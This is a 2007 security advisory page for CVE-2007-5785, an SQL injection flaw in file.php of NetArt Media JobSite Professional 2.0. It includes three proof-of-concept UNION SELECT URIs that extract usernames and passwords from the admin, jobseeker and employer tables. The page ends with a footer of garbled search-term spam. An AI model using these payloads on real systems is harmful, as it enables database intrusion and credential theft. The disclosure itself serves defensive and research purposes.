about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , JobSite Professional File.PHP SQL injection Vulnerability


Title JobSite Professional File.PHP SQL injection Vulnerability
Published 2007-10-29-12:00AM
Updated 2007-11-15-12:40AM
Class Input Validation Error
CVE   CVE-2007-5785
Remote  Yes
Local  No
Credit  ZynbER is credited with the discovery of this vulnerability.
Vulnerable  NetArt Media JobSite Professional 2.0
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following proof-of-concept URIs are available:http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_admin_users/*
http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_ext_jobseekers/*
http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_ext_employers/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 00:06:50 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo w.w.tagtag wwwxxnx;co xxltv P...e($ddd 1.3.1 www.xianba metaframe Pindi www.zhibob sex in fir MERS PHP Advanc Ayu Ajhari w.w.tagtag 191web.com Www.Hotgir abnoplasti Subscribe www.baidu1 SAXI.FILM Jenna jama HOD Www.sex700 Pmb result CMS is Fre chelsea ra news for c exploits%2 search/exp Mikro+Tik goo www.mir166 SUNrpc vediosexy modules/li xayf.com.c ASIANSEXVI Piryanka.c MyBB news for c 200 /compo Mujra www.5297k. 200 /compo news for c www.sextoo bolywood g Sex.Free rion